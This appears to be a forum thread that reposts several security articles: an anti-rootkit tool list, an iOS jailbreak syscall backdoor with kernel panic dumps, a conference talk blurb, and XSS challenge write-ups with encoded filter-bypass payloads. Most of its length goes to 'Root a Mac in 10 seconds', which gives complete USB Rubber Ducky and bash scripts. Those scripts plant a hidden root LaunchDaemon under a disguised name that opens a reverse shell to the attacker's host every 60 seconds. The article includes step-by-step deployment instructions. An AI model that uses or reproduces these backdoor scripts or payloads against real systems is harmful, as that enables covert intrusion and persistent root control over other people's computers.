aswMBR - Avast’s MBR rootkit scanner version 0.9.9. AVG PC Rescue and Repair Toolkit - bootable CD provided by AVG that covers both malware & rootkit attack remediation. Version of posting is 120.130801. Offered in ISO (for CD burning), and RAR/ZIP versions for USB stick AVG Free Bootkit Removal Tool - Rootkit specific tool. Download the “rmbootkit.exe” binary and run it on the system. Version details at time of post report V1.2.0.862. Avira Rescue System - bootable CD version along with documentation files. As of this post binaries dated Dec 2, 2013 so it’s very fresh. BitDefender Labs - Rootkit Remover - comes in both x86 and x64 bit versions. Looks for rootkits and bootkits per theFAQ. Been out a while…version 3.0.2.1 as of time of posting. 
Comodo Rescue Disk for Windows - bootable CD that can look for and remove detected rootkits and has a feature to download latest signatures before execution to ensure it remains current on detection ability. Supports Windows OS from XP though Windows 8 builds. F-Secure Blacklight Rootkit Eliminator - link via BleepingComputer - Current version as offered via the BleepingComputer page seems to be 2.2.1092.0. When ran on a “modern” Windows OS, it needs Administrator level access and complains about known compatibility problems and then exits without running. Probably still worth using as a backup scanner on XP systems but not likely useful under Win7/Win8. GMER - Rootkit Detector and Remover - This one has been kicking around for a very long time. Latest version is 2.1.19163 released 04-04-2013 and reports support for Windows NT/2000/XP/Vista/7/8 OS versions . The download page has some additional references including video files for tutorial usage. Kaspersky Lab TDSSKiller Rootkit Removal Utility - Supports a wide range of Windows OS systems, uses a GUI interface, and can be run in both normal and safe modes. Current version as of this post is 2.8.16.0. Also available in a portable version: Kaspersky TDSSKiller Portable Malwarebytes : Malwarebytes Anti-Rootkit BETA - current version 1.07.0.1008. Download, run the file to extract it where you wish and then it runs. Follow steps accordingly. The page linked has some more details you probably want to review first. Comes up often in forum referrals as one of the top-referred cleaning tools FWIW. McAfee RootkitRemover - version 0.8.9.170 released 10-25-2013 so it is still mostly fresh. Guide can be located at this McAfee link How to Use RootkitRemover. NoVirusThanks Anti-Rootkit: Low-level system analysis tool - version 1.2.0.0 released 01-15-2011. Norton Power Eraser - Free tool from Symantec. Usage guide here. I downloaded the binary today and the file details reports it is version 4.0.0.57. PowerTool Anti Virus&Rootkit Tool (x86/x64) - This is a new find to me. Offered in both x32 and x64 flavors. Appears to have had the most recent version release on 12-01-2013. Imgur has some great screenshots of version 4.2 here. The tool provides a significant number of system analysis points and data. Forum posts report earlier versions were buggy and lead to BSOD system crashes. You may want to try it out on a virtual Windows system first to check compatibility and stability before running on a production system. Rkdetector - Microsoft Rootkit Detector v2.0 2005 © - More of a system analysis tool than an actual “remover” product. Helpful for advanced responders. Superseded now by their SanityCheck tool. RogueKiller - Offered in both x32 and x64 bit apps, latest version at time of posting is v 8.7.14 released on 12-27-2013. In addition to malware/AV scan and removal it also handles some root-kits/boot-kits and MBR infections as well as some Cryptolocker pattern detections. Review the Official Tutorial for more information. Note that the page clearly states in the disclaimer that use of the tool does send feedback to the developers automatically. Be sure you read their full statement before deciding to use. That’s not necessarily a deal-breaker for me but it may be against your comfort level and/or security policies. RootKit Hook Analyzer - Another older (discontinued) analyzer product. I still have the original files myself but you cannot easily find and download them any longer. From Resplendence. 
RootkitRevealer - Windows Sysinternals - really depreciated now but I just needed to list it for old-time’s sake. Only supported under Windows XP and Server 2003. Was helpful in its day. Was one of my very first anti-rootkit detection tools. rootrepeal - version 1.3.5 and supports at least Windows XP though Vista. Hasn’t appeared to been updated since 2009. Was more useful for analysis of running processes and looking for hidden/hooked services rather than actual removal work…though you can try to use it to “clean” files manually that are found. SanityCheck, Advanced Rootkit and Malware Detector - Resplendence - version 3.00 supports Windows 8 and Server 2012 (and almost all older version of Windows as well). Scans for malware/rootkits and is extra-nice in that it provides a detailed report of findings for use in analysis and response efforts. See the feature list for more details and background. Also contains an optional “expert mode” that can be used to give super-detailed feedback. free home edition and for purchase for Pro edition. Sophos Anti-Rootkit Tool (SAR) - supported on Windows OS systems from 200 through Win 7. Doesn’t specifically says supports Windows 8 but might. Many more details including video and CLI help: Sophos Anti-Rootkit: Overview Stream Armor - Advanced Tool to Scan & Clean Malicious Alternate Data Streams (ADS) - offered by www.SecurityXploded.com. Portable tool (installation option available) supports OS systems from Windows XP to Win 8. as of post time, version is 2.5 released 03-22-2013. Trend Micro Rootkit Buster - Free tool offered in both X32 & x64 bit versions. Requires installation on the system. Appears to be last released 03-05-2013 as of the time of this post. Version is 5.00.1129. See these (x32)ReadMe and (x64)ReadMe txt files Trend Micro offers on the download page. I generally don’t rely on these tools during an incident response unless “something” indicates to me a deeper bootkit/rootkit scan is in order. Otherwise, I’m using my primary first-line response and detection tools as posted in the Anti-Malware Response “Go-Kit” post. Testing and evaluation of the tools you use is critical to validate they have worth. Just because I or others recommend a particular tool does not necessarily mean it will be effective or helpful in your particular environment or against every threat. And when dealing with these particular classes of threats, you might break your OS in the repair attempt. I did find this old (published September 2007) guide from Symantec that might be worth looking at still, A Testing Methodology for Rootkit Removal Effectiveness (PDF file link) from Josh Harriman. I’m sure I’ve left some additional tools out that other GSD users may have found valuable. If so and you have any additional recommendations to offer, please leave a note in the comments. Likewise for any more recent anti-rootkit/anti-bootkit testing & detection methodology documents or posts. Cheers, Claus Valca Sursa: grand stream dreams: “Advanced” Anti-Rootkit Tool List - Mostly Modern
  12. [h=1]Evading iOS Security[/h]Here’s some code: main() { syscall(0, 0x41414141, -1); } Here’s what happens when you run it on a device using evasi0n7: panic(cpu 0 caller 0x9dc204d7): sleh_abort: prefetch abort in kernel mode: fault_addr=0x41414140 r0: 0xffffffff r1: 0x27dffdec r2: 0x2bf0e9c4 r3: 0x2bf0e95c r4: 0x41414141 r5: 0xa48782d4 r6: 0x81b6f594 r7: 0x8f5d3fa8 r8: 0x9df1d614 r9: 0x81b6f330 r10: 0x9df1db00 r11: 0x00000006 r12: 0x00000000 sp: 0x8f5d3f60 lr: 0x93dd7048 pc: 0x41414140 cpsr: 0x20000033 fsr: 0x00000005 far: 0x41414140 And here’s what happens on an ARM64 device that also uses evasi0n7: panic(cpu 0 caller 0xffffff801522194c): PC alignment exception from kernel. (saved state: 0xffffff800dbc4640) x0: 0x2bea99c400401e08 x1: 0x00402fe92bea995c x2: 0xbdf4cd1500403008 x3: 0x0040156400000000 x4: 0x0040156400000000 x5: 0x000000002bea995c x6: 0x00402fe92bea995c x7: 0xffffff80975df438 x8: 0xffffffff41414141 x9: 0x000000000000000e x10: 0xffffff8096f9b100 x11: 0x0000000000000000 x12: 0x0000000003000004 x13: 0x0000000000401420 x14: 0x000000002be925a1 x15: 0x0000000000402ffe x16: 0x0000000000000000 x17: 0x0000000000000000 x18: 0x0000000000000000 x19: 0xffffff8096f9b410 x20: 0xffffff80977203f0 x21: 0xffffff80975df438 x22: 0xffffff80155ea3c8 x23: 0x0000000000000018 x24: 0xffffff8096f9b418 x25: 0x0000000000000000 x26: 0x0000000000000006 x27: 0x0000000000000000 x28: 0xffffff80155ea3c8 fp: 0xffffff800dbc4a60 lr: 0xffffff8015362434 sp: 0xffffff800dbc4990 pc: 0xffffffff41414141 cpsr: 0x60000304 esr: 0x8a000000 far: 0xffffffff41414141 ..And here’s the system call handler for system call 0… (ARM32 of course!) __text:00000000 CODE32 __text:00000000 STMFD SP!, {R4-R7,LR} __text:00000004 MOV R5, R2 __text:00000008 MOV R6, R1 __text:0000000C LDR R0, =0x9E415A34 __text:00000010 BLX R0 __text:00000014 LDR R0, =0x9E41E160 __text:00000018 BLX R0 __text:0000001C LDR R0, =0x9E415958 __text:00000020 BLX R0 __text:00000024 LDR R0, [R6] __text:00000028 CMP R0, #0 __text:0000002C BEQ locret_50 __text:00000030 MOV R4, R0 __text:00000034 LDR R0, [R6,#4] __text:00000038 LDR R1, [R6,#8] __text:0000003C LDR R2, [R6,#0xC] __text:00000040 LDR R3, [R6,#0x10] __text:00000044 BLX R4 __text:00000048 STR R0, [R5] __text:0000004C MOV R0, #0 __text:00000050 __text:00000050 locret_50 ; CODE XREF: __text:0000002Cj __text:00000050 LDMFD SP!, {R4-R7,PC} __text:00000050 ; --------------------------------------------------------------------------- __text:00000054 off_54 DCD 0x9E415A34 ; DATA XREF: __text:0000000Cr __text:00000058 off_58 DCD 0x9E41E160 ; DATA XREF: __text:00000014r __text:0000005C off_5C DCD 0x9E415958 ; DATA XREF: __text:0000001Cr Jailbreaking ruins security and integrity. Enough said. Have a good day. (Oh, it also can be used by any user, including mobile. One can wonder if TaiG or such is using this as a back door…) Sursa: Evading iOS Security – winocmblag
  13. Root a Mac in 10 seconds or less Posted on November 18, 2013 by Patrick Mosca
Oftentimes, physical access to a machine means game over. While people like to think that OSX is immune to most security threats, even Apple computers can be susceptible to physical attacks. Mac OSX is capable of booting into single user mode by holding a special key combination (Command-S). From this point, an attacker has root access to the entire computer. Note that this is not a security exploit, but rather an intentionally designed feature. While the intruder of course needs to be physically present, this can become a huge security problem. (There is a proven method for preventing this attack that I will cover at the end of the article.)
Since physical access to the machine is required, time is precious and must be cut to a minimum. There are two methods for optimizing time: scripts and a little tool called the USB Rubber Ducky. The Rubber Ducky is a small HID that looks like a flash drive and acts like a keyboard. It is designed to pound out scripts at freakish speeds, as if you were typing them yourself. Of course, a flash drive will work too. This backdoor is almost identical to the basic backdoor described in OSX Backdoor – Persistence. Read that article if you would like to better understand the inner workings of this backdoor. Similarly, we will create a script that sends a shell back home through netcat. Finally, we will add the script as a Launch Daemon, where it will be executed as root every 60 seconds.
The Rubber Ducky Method
1) Download the Ducky Decoder and Firmware from here. Be sure to use duck_v2.1.hex or above. There are instructions on how to flash your ducky. At the time of writing this, I used Ducky Decoder v2.4 and duck_v2.1.hex firmware. (Special thanks to midnitesnake for patching the firmware)
2) Create the script source.txt. Be sure to replace mysite.com with your IP address or domain name. Similarly, place your port number 1337 on the same line.
REM Patrick Mosca
REM A simple script for rooting OSX from single user mode.
REM Change mysite.com to your domain name or IP address
REM Change 1337 to your port number
REM Catch the shell with 'nc -l -p 1337'
DELAY 1000
STRING mount -uw /
ENTER
DELAY 2000
STRING mkdir /Library/.hidden
ENTER
DELAY 200
STRING echo '#!/bin/bash
ENTER
STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1
ENTER
STRING wait' > /Library/.hidden/connect.sh
ENTER
DELAY 500
STRING chmod +x /Library/.hidden/connect.sh
ENTER
DELAY 200
STRING mkdir /Library/LaunchDaemons
ENTER
DELAY 200
STRING echo '<?xml version="1.0" encoding="UTF-8"?>
ENTER
STRING <plist version="1.0"><dict>
ENTER
STRING <key>Label</key>
ENTER
STRING <string>com.apples.services</string>
ENTER
STRING <key>ProgramArguments</key>
ENTER
STRING <array>
ENTER
STRING <string>/bin/sh</string>
ENTER
STRING <string>/Library/.hidden/connect.sh</string>
ENTER
STRING </array>
ENTER
STRING <key>RunAtLoad</key>
ENTER
STRING <true/>
ENTER
STRING <key>StartInterval</key>
ENTER
STRING <integer>60</integer>
ENTER
STRING <key>AbandonProcessGroup</key>
ENTER
STRING <true/>
ENTER
STRING </dict>
ENTER
STRING </plist>' > /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 500
STRING chmod 600 /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 200
STRING launchctl load /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 1000
STRING shutdown -h now
ENTER
3) Compile and install the script. From within the ducky decoder folder, execute:
java -jar encoder.jar -i source.txt -o inject.bin -l us
Move your inject.bin over to the ducky.
4) Boot into single user mode (Command – S).
5) At the command prompt, plug in the ducky.
6) Catch your shell.
nc -l -p 1337
or, depending on your netcat version:
nc -l 1337
Say hello! You are now root.
The USB Flash Drive Method
1) Create the file install.bash on a flash drive.
#!/bin/bash
#Create the hidden directory /Library/.hidden
mkdir /Library/.hidden
#Copy the script to the hidden folder
echo "#!/bin/bash
bash -i >& /dev/tcp/mysite.com/1337 0>&1
wait" > /Library/.hidden/connect.sh
#Give the script permission to execute
chmod +x /Library/.hidden/connect.sh
#Create the directory if it doesn't already exist.
mkdir /Library/LaunchDaemons
#Write the .plist to LaunchDaemons
echo '<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.apples.services</string>
<key>ProgramArguments</key>
<array>
<string>/bin/sh</string>
<string>/Library/.hidden/connect.sh</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>StartInterval</key>
<integer>60</integer>
<key>AbandonProcessGroup</key>
<true/>
</dict>
</plist>' > /Library/LaunchDaemons/com.apples.services.plist
chmod 600 /Library/LaunchDaemons/com.apples.services.plist
#Load the launch daemon
launchctl load /Library/LaunchDaemons/com.apples.services.plist
shutdown -h now
2) Boot into single user mode (Command – S).
3) Execute the commands.
mount -uw /
mkdir /Volumes/usb
ls /dev
mount_msdos /dev/disk1s1 /Volumes/usb
cd /Volumes/usb
./install.bash
disk1s1 will change! If you're not sure which device is your flash drive, take out your device, list devices, put your flash drive back in, and list devices again. Your flash drive will be the device that has come and gone.
4) Catch your shell.
nc -l -p 1337
or:
nc -l 1337
The difference between the USB Rubber Ducky method and the flash drive method is night and day. There is a little more preparation that goes into setting up the ducky, but execution time is prime. When time is of the essence, listing devices, making directories, and mounting flash drives can impede an "operation." Whichever route you choose, both methods will ensure a persistent backdoor as the root user.
As for preventing this lethal attack, there are two possible defenses. Locking the EFI firmware will prevent users from accessing single user mode by protecting it with a password. Don't do this. It is a complete waste of time. The password can be reset by removing physical RAM and resetting the PRAM as described here. The only sure way to prevent unwanted root access to your system is by simply enabling FileVault's full disk encryption (not home folder encryption!). Since this encrypts the entire drive, it will be impossible to access single user mode without the (strong) password. Problem solved.
This article was written to show the vulnerabilities of Macs without full disk encryption or locked EFI firmware. Please no one get in trouble. It is very easy to sniff the wire and find the attacker's IP address that is causing excessive noise every 60 seconds. I put the script and version 2.6.3 of the ducky encoder on Github for convenience. If you found this interesting, give a star. Thanks for reading. Sursa: Root a Mac in 10 seconds or less | Patrick Mosca
  14. 30c3 - The Arduguitar: An Arduino Powered Electric Guitar Description: The ArduGuitar: An Arduino Powered Electric Guitar. The ArduGuitar is an electric guitar with no physical controls, i.e. no buttons or knobs to adjust volume, tone or to select the pickups. All of these functions are performed remotely via a Bluetooth device such as an Android phone, or via a dedicated Arduino-powered Bluetooth footpedal. The musician still plucks the strings, of course! This talk will give an overview of the technology and particularly the voyage that took me from nearly no knowledge about anything electronic to enough know-how to make it all work. I will explain what I learned by collaborating on forums, with Hackerspaces and with component providers: "How to ask the right questions." The guitar with its Arduino-powered circuit and an Android tablet will be available for demo; the code is all available in the github arduguitar repo with the associated Arduino footpedal libraries. For More Information please visit: - https://events.ccc.de/congress/2013/wiki/Main_Page Sursa: 30c3 - The Arduguitar: An Arduino Powered Electric Guitar
  15. escape.alf.nu XSS Challenges Write-ups (Part 2) These are my solutions to Erling Ellingsen escape.alf.nu XSS challenges. I found them very interesting and I learnt a lot from them (especially from the last ones published in this post). Im publishing my results since the game has been online for a long time now and there are already some sites with partial results. My suggestion, if you havent done it so far, is to go and try to solve them by yourselves…. so come on, dont be lazy, stop reading here and give them a try … … … … … Ok so if you have already solve them or need some hints, here are my solutions Level 9: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7[/TD] [TD=class: code]function escape(s) { // This is sort of a spoiler for the last level if (/[\\<>]/.test(s)) return '-'; return '<script>console.log("' + s.toUpperCase() + '")</script>'; }[/TD] [/TR] [/TABLE] Some as level 8 but now we cannot use angle brackets (<>) nor backslashes (\) Solutions: Is it possible to use an online non-alphanumeric encoder to encode the following payload so it uses no alpha characters, angle brackets (<>) nor backslashes (\) [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]"+alert(1))//[/TD] [/TR] [/TABLE] Producing a huge solution (5627): [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]"+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[+[]]+([][[]]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])()([][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][
(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])()(([]+{})[+[]])[+[]]+(!+[]+!![]+[])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[]))+(+!![]+[])+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[+[]]+([][[]]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])()([][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])()(([]+{})[+[]])[+[]]+(!+[]+!![]+[])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])))())//[/TD] [/TR] [/TABLE] We can also try to use our own minimization using the letters in “false”, “true”, “undefined” and “object”: [TABLE] [TR] [TD]”+!1[/TD] [TD]false[/TD] 
[/TR] [TR] [TD]”+!0[/TD] [TD]true[/TD] [/TR] [TR] [TD]”+{}[0][/TD] [TD]undefined[/TD] [/TR] [TR] [TD]”+{}[/TD] [TD][object Object][/TD] [/TR] [/TABLE] Strings we will need: [TABLE] [TR] [TD]sort[/TD] [TD][(”+!1)[3]+(”+{})[1]+(”+!0)[1]+(”+!0)[0]][/TD] [/TR] [TR] [TD]constructor[/TD] [TD][(”+{})[5]+(”+{})[1]+(”+{}[0])[1]+(”+!1)[3]+(”+!0)[0]+(”+!0)[1]+(”+!0)[2]+(”+{})[5]+(”+!0)[0]+(”+{})[1]+(”+!0)[1]][/TD] [/TR] [TR] [TD]alert(1)[/TD] [TD](”+!1)[1] + (”+!1)[2] + (”+!1)[4] +(”+!0)[1]+(”+!0)[0]+”(1)”[/TD] [/TR] [/TABLE] We will replace the call to alert(1) in our payload: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]"+alert(1))//[/TD] [/TR] [/TABLE] with the following one so we can simplify the encoding to encode strings. [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]"+[]["sort"]["constructor"]("alert(1)")()//[/TD] [/TR] [/TABLE] Note: Many other alternatives are possible like: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]"+(0)['constructor']['constructor']("alert(1)")()//[/TD] [/TR] [/TABLE] But I found the “sort” one to be the shortest (with other 4 letter functions like “trim”) This is a 246 characters solution: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]"+[][(''+!1)[3]+(''+{})[1]+(''+!0)[1]+(''+!0)[0]][(''+{})[5]+(''+{})[1]+(''+{}[0])[1]+(''+!1)[3]+(''+!0)[0]+(''+!0)[1]+(''+!0)[2]+(''+{})[5]+(''+!0)[0]+(''+{})[1]+(''+!0)[1]]((''+!1)[1] + (''+!1)[2] + (''+!1)[4] +(''+!0)[1]+(''+!0)[0]+"(1)")())//[/TD] [/TR] [/TABLE] We can improve it by defining a variable containing all our letters and then just referencing it: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]_=''+!1+!0+{}[0]+{} = "falsetrueundefined[object Object]"[/TD] [/TR] [/TABLE] [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]");_=''+!1+!0+{}[0]+{};[][_[3]+_[19]+_[6]+_[5]][_[23]+_[19]+_[10]+_[3]+_[5]+_[6]+_[7]+_[23]+_[5]+_[19]+_[6]](_[1]+_[2]+_[4]+_[6]+_[5]+'(1)')()//[/TD] [/TR] [/TABLE] Now the solution is 144 characters which is still far from the winners: Next iteratation is to change the base payload for something sorter like window.alert(1) In chrome, we can leak a reference to window with: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code](0,[]["concat"])()[0][/TD] [/TR] [/TABLE] So using the same strings as above we get the following 100 characters solution: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]");_=""+!1+!0+{}[0]+{};(0,[][_[23]+_[19]+_[10]+_[23]+_[1]+_[5]])()[0][_[1]+_[2]+_[4]+_[6]+_[5]](1)//[/TD] [/TR] [/TABLE] We are still taking too many chars for defining our alphabet. 
Here is where Mario surprised me once again with this tweet: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]");(_=!1+URL+!0,[][_[8]+_[11]+_[7]+_[8]+_[1]+_[9]])()[0][_[1]+_[2]+_[4]+_[38]+_[9]](1)//[/TD] [/TR] [/TABLE] Note that he is using !1+URL+!0 as the alphabet string and it difers for different browsers: Firefox: [TABLE] [TR] [TD=class: gutter]1 2 3[/TD] [TD=class: code]_=!1+URL+!0="falsefunction URL() { [native code] }true"[/TD] [/TR] [/TABLE] Chrome: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]_=!1+URL+!0="falsefunction URL() { [native code] }true"[/TD] [/TR] [/TABLE] Other interesting Mario ’s finding is that inside with-statements, almost everything leaks [object Window] for example: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]with(0) x=[].sort,)[/TD] [/TR] [/TABLE] Level 10: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26[/TD] [TD=class: code]function escape(s) { function htmlEscape(s) { return s.replace(/./g, function(x) { return { '<': '<', '>': '>', '&': '&', '"': '"', "'": ''' }[x] || x; }); } function expandTemplate(template, args) { return template.replace( /{(\w+)}/g, function(_, n) { return htmlEscape(args[n]); }); } return expandTemplate( " \n\ <h2>Hello, <span id=name></span>!</h2> \n\ <script> \n\ var v = document.getElementById('name'); \n\ v.innerHTML = '<a href=#>{name}</a>'; \n\ <\/script> \n\ ", { name : s } ); }[/TD] [/TR] [/TABLE] Injection takes place in a JS string context and since “\” is not escaped in the 